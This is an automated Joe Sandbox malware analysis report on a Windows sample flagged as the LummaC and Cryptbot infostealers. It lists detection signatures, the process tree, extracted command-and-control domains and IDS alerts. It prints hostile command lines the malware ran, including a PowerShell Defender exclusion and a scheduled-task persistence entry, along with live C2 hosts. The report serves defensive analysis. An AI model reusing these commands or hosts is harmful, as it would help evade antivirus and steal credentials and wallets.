Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1516779
MD5:334014ba9b86b1e9c387a2fbd3b32053
SHA1:8fa39699d6621aadeb1b02f8316aabb40856eef3
SHA256:c22d408c5bc0891b7d3dc87baafcae710314bd7ef59a06960ea0d6da31f0e657
Tags:NETexeMSILx64user-jstrosch
Infos:

Detection

LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Drops PE files to the document folder of the user
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 334014BA9B86B1E9C387A2FBD3B32053)
    • powershell.exe (PID: 7620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8004 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • wab.exe (PID: 7672 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • z2_3yhxvvYYX1CmTdADYCHAQ.exe (PID: 3340 cmdline: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe MD5: 8A35BE4E0576E642603DC78F07F32A93)
        • z2_3yhxvvYYX1CmTdADYCHAQ.exe (PID: 356 cmdline: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe MD5: 8A35BE4E0576E642603DC78F07F32A93)
      • RXdQ_uc4E2f9zze8GHsJCP4V.exe (PID: 1796 cmdline: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe MD5: B8A15F36239AC6A968A373BF93D06CE6)
        • BitLockerToGo.exe (PID: 2384 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • j1XaE_3LRXkWT1prPdjt1dhT.exe (PID: 1736 cmdline: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe MD5: 950CFC590026C689357A2DB4C9DE3FA6)
        • service123.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 6661EFE43707F9C14239C4E43959C8F4)
        • schtasks.exe (PID: 7800 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wab.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
    • WerFault.exe (PID: 7812 cmdline: C:\Windows\system32\WerFault.exe -u -p 7488 -s 900 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • z2_3yhxvvYYX1CmTdADYCHAQ.exe (PID: 2800 cmdline: "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe" MD5: 8A35BE4E0576E642603DC78F07F32A93)
    • z2_3yhxvvYYX1CmTdADYCHAQ.exe (PID: 2616 cmdline: "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe" MD5: 8A35BE4E0576E642603DC78F07F32A93)
  • z2_3yhxvvYYX1CmTdADYCHAQ.exe (PID: 6108 cmdline: "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe" MD5: 8A35BE4E0576E642603DC78F07F32A93)
    • z2_3yhxvvYYX1CmTdADYCHAQ.exe (PID: 4268 cmdline: "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe" MD5: 8A35BE4E0576E642603DC78F07F32A93)
  • service123.exe (PID: 8060 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 6661EFE43707F9C14239C4E43959C8F4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 url": ["keennylrwmqlw.shop", "relaxatinownio.shop", "tesecuuweqo.shop", "tryyudjasudqo.shop", "licenseodqwmqn.shop", "reggwardssdqw.shop", "tendencctywop.shop", "eemmbryequo.shop"], "Build id": "9mkWlh--saifkrx"}
{"C2 list": ["tventyvf20vs.top", "analforeverlovyu.top", "@tventyvf20vs.top"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    0000000F.00000003.2589222539.000000000408A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Clipboard_Hijacker_5Yara detected Clipboard HijackerJoe Security
      0000000E.00000002.1975978502.0000000003812000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      Process Memory Space: file.exe PID: 7488JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: file.exe PID: 7488JoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          26.2.service123.exe.6c830000.1.unpackJoeSecurity_Clipboard_Hijacker_5Yara detected Clipboard HijackerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7488, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, ProcessId: 7620, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe, ParentImage: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe, ParentProcessId: 1736, ParentProcessName: j1XaE_3LRXkWT1prPdjt1dhT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 7800, ProcessName: schtasks.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, CommandLine: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, NewProcessName: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, OriginalFileName: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7672, ParentProcessName: wab.exe, ProcessCommandLine: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, ProcessId: 3340, ProcessName: z2_3yhxvvYYX1CmTdADYCHAQ.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, ProcessId: 356, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyProgram
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7488, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, ProcessId: 7620, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe, ParentImage: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe, ParentProcessId: 1736, ParentProcessName: j1XaE_3LRXkWT1prPdjt1dhT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 7800, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7488, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, ProcessId: 7620, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:34:29.795856+020020197142Potentially Bad Traffic192.168.2.849734103.130.147.21180TCP
            2024-09-24T15:34:34.879491+020020197142Potentially Bad Traffic192.168.2.849734103.130.147.21180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:34:12.227487+020020543501A Network Trojan was detected192.168.2.8497485.53.124.19580TCP
            2024-09-24T15:34:12.227487+020020543501A Network Trojan was detected192.168.2.8497475.53.124.19580TCP
            2024-09-24T15:34:12.227487+020020543501A Network Trojan was detected192.168.2.8497635.53.124.19580TCP
            2024-09-24T15:34:12.227487+020020543501A Network Trojan was detected192.168.2.8497505.53.124.19580TCP
            2024-09-24T15:35:13.926693+020020543501A Network Trojan was detected192.168.2.8497585.53.124.19580TCP
            2024-09-24T15:35:18.833958+020020543501A Network Trojan was detected192.168.2.8497625.53.124.19580TCP
            2024-09-24T15:35:25.072889+020020543501A Network Trojan was detected192.168.2.8497685.53.124.19580TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.691545+020020558791Domain Observed Used for C2 Detected192.168.2.8550391.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.518442+020020558811Domain Observed Used for C2 Detected192.168.2.8575501.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.532393+020020558831Domain Observed Used for C2 Detected192.168.2.8608421.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.680044+020020558851Domain Observed Used for C2 Detected192.168.2.8633741.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.645852+020020558871Domain Observed Used for C2 Detected192.168.2.8552151.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.543025+020020558911Domain Observed Used for C2 Detected192.168.2.8607501.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.575146+020020558931Domain Observed Used for C2 Detected192.168.2.8590151.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:35:12.705862+020020558951Domain Observed Used for C2 Detected192.168.2.8558681.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-24T15:34:29.824438+020028032702Potentially Bad Traffic192.168.2.849735103.130.147.21180TCP
            2024-09-24T15:34:29.963085+020028032702Potentially Bad Traffic192.168.2.849734103.130.147.21180TCP
            2024-09-24T15:34:34.879491+020028032702Potentially Bad Traffic192.168.2.849734103.130.147.21180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 14.2.RXdQ_uc4E2f9zze8GHsJCP4V.exe.36e4000.2.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["keennylrwmqlw.shop", "relaxatinownio.shop", "tesecuuweqo.shop", "tryyudjasudqo.shop", "licenseodqwmqn.shop", "reggwardssdqw.shop", "tendencctywop.shop", "eemmbryequo.shop"], "Build id": "9mkWlh--saifkrx"}
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe.1736.15.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["tventyvf20vs.top", "analforeverlovyu.top", "@tventyvf20vs.top"]}
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Channel2[1].exeReversingLabs: Detection: 63%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\CheckTool[1].exeReversingLabs: Detection: 18%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tac[1].exeReversingLabs: Detection: 29%
            Source: file.exeReversingLabs: Detection: 18%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
            Source: file.exeJoe Sandbox ML: detected
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: tryyudjasudqo.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: eemmbryequo.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: reggwardssdqw.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: relaxatinownio.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: tesecuuweqo.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: tendencctywop.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: licenseodqwmqn.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: keennylrwmqlw.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: keennylrwmqlw.shop
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 0000000E.00000002.1975978502.00000000036E4000.00000004.00001000.00020000.00000000.sdmpString decryptor: 9mkWlh--saifkrx

            Exploits

            barindex
            Source: Yara matchFile source: 00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49715 version: TLS 1.2
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805096282.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdb source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.0000000003736000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1961213361.00000000035AE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1804506801.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1804506801.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1975978502.0000000003736000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1961213361.00000000035AE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805096282.000001A408990000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE29280 FindFirstFileExW,FindClose,13_2_00007FF6AAE29280
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE283C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF6AAE283C0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE41874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF6AAE41874
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE29280 FindFirstFileExW,FindClose,20_2_00007FF6AAE29280
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE283C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,20_2_00007FF6AAE283C0
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 20_2_00007FF6AAE41874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00007FF6AAE41874
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 23_2_00007FFBA5DE0E70 FindFirstFileExW,FindClose,wcscpy_s,23_2_00007FFBA5DE0E70
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]19_2_00410054
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi19_2_0043F2E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-24h]19_2_0043F5EF
